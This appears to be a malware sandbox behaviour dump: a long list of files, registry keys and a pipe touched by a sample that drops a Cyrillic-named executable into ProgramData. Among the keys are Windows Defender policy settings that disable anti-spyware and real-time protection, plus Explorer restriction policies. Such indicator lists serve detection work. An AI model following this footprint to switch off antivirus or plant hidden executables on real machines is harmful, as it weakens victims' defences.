C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.920.15894096
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.920.15894096
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9ZOG3AYK6S7RIC8L0R98.temp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFe4f3f1.TMP
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.3132.15004767
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.3132.15004767
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.3132.15004767
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\C2L4RYQ1YV2T42SO3QLN.temp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFe4f317.TMP
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.3640.15004595
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.3640.15004595
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.3640.15004595
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\C6G2ARDY24RHA3XN3YP9.temp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFf289c9.TMP
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.3112.15895047
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.3112.15895047
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.3112.15895047
C:\Windows\sysnative\data\
C:\Windows\Temp
C:\Users\user\AppData\Local\Temp\exlxo5YyAuKqn.exe
C:\ProgramData\\xd1\x80\xd0\xbe\xd0\xbf\xd1\x80\xd0\xa3\xd0\x92\xd0\xb0\xd0\xab\xd1\x81\xd0\xb5\xd0\xbd\xd0\xbe\xd1\x80\xd1\x85.exe
C:\Users\user\AppData\Roaming\Microsoft
C:\Users\user\AppData\Roaming\Microsoft\Crypto
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-120665959-548228820-2376508522-1001
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Windows\sysnative\en-US\sc.exe.mui
C:\Windows\sysnative\en-US\KERNELBASE.dll.mui
\Device\KsecDD
C:\
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\cversions.1.db
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000d.db
C:\Users\desktop.ini
C:\Users
C:\Users\user
C:\Users\user\AppData
C:\Users\user\AppData\Roaming
C:\Users\user\AppData\Roaming\Microsoft\desktop.ini
C:\Users\user\AppData\Roaming\Microsoft\Windows
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
C:\Users\user\Desktop\desktop.ini
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini
C:\ProgramData
C:\ProgramData\Microsoft\desktop.ini
C:\ProgramData\Microsoft
C:\ProgramData\Microsoft\Windows
C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini
C:\ProgramData\Microsoft\Windows\Start Menu
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini
C:\Users\Public\desktop.ini
C:\Users\Public
C:\Users\Public\Desktop\desktop.ini
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
C:\Users\user\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
C:\Windows\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk\desktop.ini
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\powershell.exe.mui
C:\ProgramData\Microsoft\Windows\Start Menu\Programs
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\desktop.ini
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell
\??\PIPE\srvsvc
C:\Windows
C:\Windows\sysnative
C:\Windows\sysnative\WindowsPowerShell
C:\Windows\sysnative\WindowsPowerShell\v1.0
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\00R5Q3FLPU2BRO922T83.temp
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll
C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe.config
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorwks.dll
C:\Windows\winsxs\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_88df89932faf0bf6\msvcr80.dll
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\machine.config
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch
C:\Windows\assembly\NativeImages_v2.0.50727_64\index169.dat
C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\9469491f37d9c35b596968b206615309\mscorlib.ni.dll
C:\Windows\assembly\pubpol23.dat
C:\Windows\assembly\NativeImages_v2.0.50727_64\System\adff7dd9fe8e541775c46b6363401b22\System.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\b023321bc53c20c10ccbbd8f78c82c82\Microsoft.PowerShell.ConsoleHost.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Management.A#\009a09f5b2322bb8c5520dc5ddbb28bb\System.Management.Automation.ni.dll
C:\Windows\sysnative\l_intl.nls
C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Core\83e2f6909980da7347e7806d8c26670e\System.Core.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\ec50af274bf7a15fb59ac1f0d353b7ea\Microsoft.PowerShell.Commands.Diagnostics.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Configuratio#\fcf35536476614410e0b0bd0e412199e\System.Configuration.Install.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.WSMan.Man#\8cd73e65058ef6f77f36b62a74ec3344\Microsoft.WSMan.Management.ni.dll
C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Transactions\051655963f24f9ade08486084c570086\System.Transactions.ni.dll
C:\Windows\assembly\GAC_64\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\cdf48153115fc0bb466f37b7dcad9ac5\Microsoft.PowerShell.Commands.Utility.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\9206dc8156588e608d405729c833edc5\Microsoft.PowerShell.Commands.Management.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\b5a6a5ce3cd3d4dd2b151315c612aeff\Microsoft.PowerShell.Security.ni.dll
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Culture.dll
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorjit.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Xml\ee795155543768ea67eecddc686a1e9e\System.Xml.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Management\c44929bde355680c886f8a52f5e22b81\System.Management.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.DirectorySer#\c1cdea55f62c9e8b9b9c1ae4c23b1c1f\System.DirectoryServices.ni.dll
C:\Windows\sysnative\WindowsPowerShell\v1.0\GetEvent.types.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\types.ps1xml
C:\Windows\sysnative\tzres.dll
C:\Windows\sysnative\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\WSMan.format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\Certificate.format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\FileSystem.format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\Help.format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\Registry.format.ps1xml
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Data\accc3a5269658c8c47fe3e402ac4ac1c\System.Data.ni.dll
C:\Windows\assembly\GAC_64\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TQQ8PD6SYDSTEQFLYPJ7.temp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7K5UWNQAAA284NII014E.temp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5ZNGV2JSA4OCNZIV8RKJ.temp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IDMN0LR05DQCP1U000ZS.temp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DY63D6T0HFBA1VQSZOV0.temp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0F89DDCRI5G2QC12KTBO.temp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9ZOG3AYK6S7RIC8L0R98.temp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\C2L4RYQ1YV2T42SO3QLN.temp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\C6G2ARDY24RHA3XN3YP9.temp
C:\ProgramData\\xd1\x80\xd0\xbe\xd0\xbf\xd1\x80\xd0\xa3\xd0\x92\xd0\xb0\xd0\xab\xd1\x81\xd0\xb5\xd0\xbd\xd0\xbe\xd1\x80\xd1\x85.exe
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-120665959-548228820-2376508522-1001\f58155b4b1d5a524ca0261c3ee99fb50_fb20aa52-1ec9-4d1f-b923-f6709499e604
C:\Users\user\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
\??\PIPE\srvsvc
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\00R5Q3FLPU2BRO922T83.temp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFe4e532.TMP
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TQQ8PD6SYDSTEQFLYPJ7.temp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFe4e8ab.TMP
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7K5UWNQAAA284NII014E.temp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5ZNGV2JSA4OCNZIV8RKJ.temp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IDMN0LR05DQCP1U000ZS.temp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DY63D6T0HFBA1VQSZOV0.temp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFe4ed4d.TMP
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0F89DDCRI5G2QC12KTBO.temp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFf28611.TMP
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9ZOG3AYK6S7RIC8L0R98.temp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFe4f3f1.TMP
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\C2L4RYQ1YV2T42SO3QLN.temp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFe4f317.TMP
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\C6G2ARDY24RHA3XN3YP9.temp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFf289c9.TMP
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFe4e532.TMP
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.2952.15001147
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.2952.15001147
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.2952.15001147
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFe4e8ab.TMP
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.1628.15001881
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.1628.15001896
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.1628.15001896
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7K5UWNQAAA284NII014E.temp
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.624.15891007
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.624.15891007
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.624.15891007
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5ZNGV2JSA4OCNZIV8RKJ.temp
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.2056.15001974
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.2056.15001974
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.2056.15001974
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IDMN0LR05DQCP1U000ZS.temp
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.3004.15002941
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.3004.15002941
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.3004.15002941
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFe4ed4d.TMP
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.1964.15003051
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.1964.15003051
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.1964.15003066
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFf28611.TMP
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.920.15894096
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.920.15894096
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.920.15894096
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFe4f3f1.TMP
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.3132.15004767
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.3132.15004767
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.3132.15004767
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFe4f317.TMP
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.3640.15004595
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.3640.15004595
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.3640.15004595
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFf289c9.TMP
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.3112.15895047
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.3112.15895047
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.3112.15895047
DisableUserModeCallbackFilter
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-GB
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-GB
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\exlxo5YyAuKqn.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\Generation
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-120665959-548228820-2376508522-1001
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-120665959-548228820-2376508522-1001\State
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-120665959-548228820-2376508522-1001\Preference
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-120665959-548228820-2376508522-1001\ProfileImagePath
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\??????????????.exe
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor\DisableUNCCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor\EnableExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor\DelayedExpansion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor\DefaultColor
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor\CompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor\PathCompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor\AutoRun
HKEY_CURRENT_USER\Software\Microsoft\Command Processor
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DisableUNCCheck
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DefaultColor
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000809
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesMyComputer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesRecycleBin
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoInternetIcon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\powershell.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCommonGroups
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2\ProgramsCache
\xe4\xa4\x90\xe3\x84\x80
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Roamable
